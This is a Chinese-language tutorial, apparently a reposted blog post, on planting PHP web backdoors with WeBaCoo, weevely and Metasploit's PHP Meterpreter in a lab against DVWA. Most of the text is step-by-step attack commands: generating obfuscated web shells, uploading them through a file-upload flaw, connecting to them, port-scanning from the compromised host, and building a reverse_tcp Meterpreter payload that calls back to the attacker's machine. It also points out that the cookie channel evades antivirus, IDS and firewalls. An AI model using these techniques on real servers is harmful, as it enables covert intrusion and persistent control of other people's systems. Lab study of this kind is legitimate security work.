Kali 2.0 Web後門工具----WebaCoo、weevely、PHP Meterpreter

注:如下內容僅供學習使用,其餘行爲均與做者無關!轉載請註明出處,謝謝! php

本文將介紹 Kali 2.0 版本下的三款Web後門工具:WebaCoo、weevely、PHP Meterpreter,這類工具一般用於維護控制權。 web

實驗環境: shell

● KALI 的IP地址是192.168.44.138; 服務器

● Metasploit的IP地址是192.168.44.130 ; 網絡

1、 WeBaCoo

WeBaCoo(Web Backdoor Cookie)是一款隱蔽的腳本類Web後門工具。藉助HTTP協議,它可在客戶端和Web服務器之間實現執行代碼的網頁終端。WeBaCoo的精妙之處在於,Web服務器和客戶端之間的通訊載體是Cookie。這就意味着多數的殺毒軟件、網絡入侵檢測/防護系統、網絡防火牆和應用程序防火牆都沒法檢測到後門的存在。 tcp

一、WeBaCoo有兩種操做模式。 工具

● Generation(生產線模式):指定-g 選項可進入這種模式。用戶可在這種模式下製做PHP 代碼的payload。 學習

● Terminal(終端模式):指定-t選項可進入這種模式。用戶可在這種模式下鏈接到被測主機的後門程序。 測試

二、在WeBaCoo 的HTTP Cookie 中,如下三個參數的做用最爲重要。 ui

● cm:以Base64 編碼的shell指令。

● cn:加載着編碼後輸出內容的Cookie名稱。

● cp:封裝編碼後輸出內容的分隔符。

三、啓動WeBaCoo程序,在終端中執行如下命令:

#webacoo -h

與生成模式有關的命令行選項以下。

clip_image002[3]

4、實例:

(1)用默認的設置,生成名爲test.php的PHP後門程序,並使用WeBaCoo的代碼混淆技術對後門進行處理,命令以下:

root@kali:~# webacoo -g -o test.php

clip_image004[3]

(2)查看文件test.php的內容如圖所示:

clip_image006[3]

(3)接下來,把這個後門文件上傳到被測主機(192.168.44.130)。我這裏經過dvwa文件上傳作測試:

clip_image008[3]

(4)上傳後訪問執行:

clip_image010[3]

(5)接下來就可使用如下指令鏈接到被測主機的後門程序。

root@kali:~# webacoo -t -u http://192.168.44.130/dvwa/hackable/uploads/test.php這樣就能夠鏈接到主機上的Web shell:

clip_image012[3]

(6)防火牆和代理服務器只可以發現客戶端在發送以下請求:

clip_image014[3]

服務端的響應信息以下:

clip_image016[3]

上述HTTP request和 response代表,WeBaCoo後門的客戶端和服務器端的通訊是不易發現的加密會話。它所用的混淆技術下降了它被發覺的可能性。

2、 weevely

weevely 是一款具備高隱蔽性的針對PHP 平臺的Web shell。它實現了SSH 風格的終端界面,並有大量自動化的模塊。測試人員可用它執行系統指令、遠程管理和滲透後期的自動滲透。下面是weevely的主要功能:

(1)它有30多種可完成自動管理滲透後期任務的功能模塊。這些模塊可以:

執行命令和瀏覽遠程文件系統;

檢測常見的服務器配置問題;

創造TCP shell和reverse shell;

在被測主機上安裝HTTP代理;

利用目標主機進行端口掃描。

(2)使用HTTP Cookie做爲後門通訊的載體;

(3)支持密碼認證;

一、啓動weevely程序,可在終端中使用如下命令;。

root@kali:~# weevely

clip_image018[3]

weeavely的主要用途是:

● 生成混淆PHP backdoor;

● 在圖像文件中追加多態的後門程序,並可經過.htaccess 文件賦予圖像文件執行權限;

● 生成後門.htaccess 文件。

● 可經過help選項列出程序的所有模塊和生成工具。

2、實例:

(1)生成混淆PHP backdoor,並將後門保存爲test1.php,命令以下:

root@kali:~# weevely generate password test1.php

clip_image020[3]

(2)上述指令生成的test1.php的內容如圖所示。

clip_image022[3]

(3)而後經過正常的途徑或利用程序的漏洞,把後門文件上傳到目標服務器上。

clip_image024[3]

(4)訪問成功上傳的Webshell;

clip_image026[3]

(5)鏈接Webshell,命令以下:

root@kali:~# weevely http://192.168.44.130/dvwa/hackable/uploads/test1.php password

只要鏈接成功,您就能鏈接到weevely的Web shell上。而後執行命令,查看目標主機的信息;

clip_image028[3]

(6)上述信息代表,咱們成功地鏈接到被測主機的Webshell。經過:help指令查看weevely支持的各類指令:

clip_image030[3]

(7)使用net_scan模塊掃描被測主機的22,80,8080端口;

www-data@192.168.44.130:/var/www/dvwa/hackable/uploads $ :net_scan 192.168.44.130 22,80,8080

掃描結果以下:

clip_image032[3]

您可隨時使用組合鍵Ctrl+D 退出weevely shell。

3、PHP Meterpreter

Metasploit 有一個名爲PHP Meterpreter的payload。這個模塊能夠建立具備Meterpreter功能的PHP Web shell。利用目標的漏洞(諸如常見的注入和上傳漏洞)以後,再把它的shell傳到目標主機便可。

1、實例

(1)製做PHP meterpreter,命令以下:

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.44.138 -f raw> php-meter.php

上述指令各選項的做用以下。

● -p:指定payload 爲php/meterpreter/reverse_tcp。

● -f:設置輸出格式(raw)。

Metasploit 會把生成的PHP meterpreter保存爲文件php-mter.php。

clip_image034[3]

(2)在上傳後門到被測主機以前,首先要刪除腳本第一行的註釋。註釋後文件內容以下:

clip_image036[3]

(3)在Kali的主機上啓動Metasploit Console(msfconsole),並啓動multi/handler exploit。指定製做shell後門時用的 php/meterpreter/reverse_tcp payload。設置LHOST爲Kali主機的IP 地址。使用exploit指令運行exploit的受理程序(handler);

clip_image038[3]

(4)在利用注入或者遠程文件包含漏洞等Web漏洞以後,把Web shell上傳到目標服務器;

clip_image040[3]

(5)訪問上傳的webshell :

clip_image042[3]

(6) 以後,在運行Kali的測試主機上,Metasploit程序將會顯示Meterpreter會話;

clip_image044[3]

此時,您就可使用sysinfo和getuid之類的命令了。

相關文章
相關標籤/搜索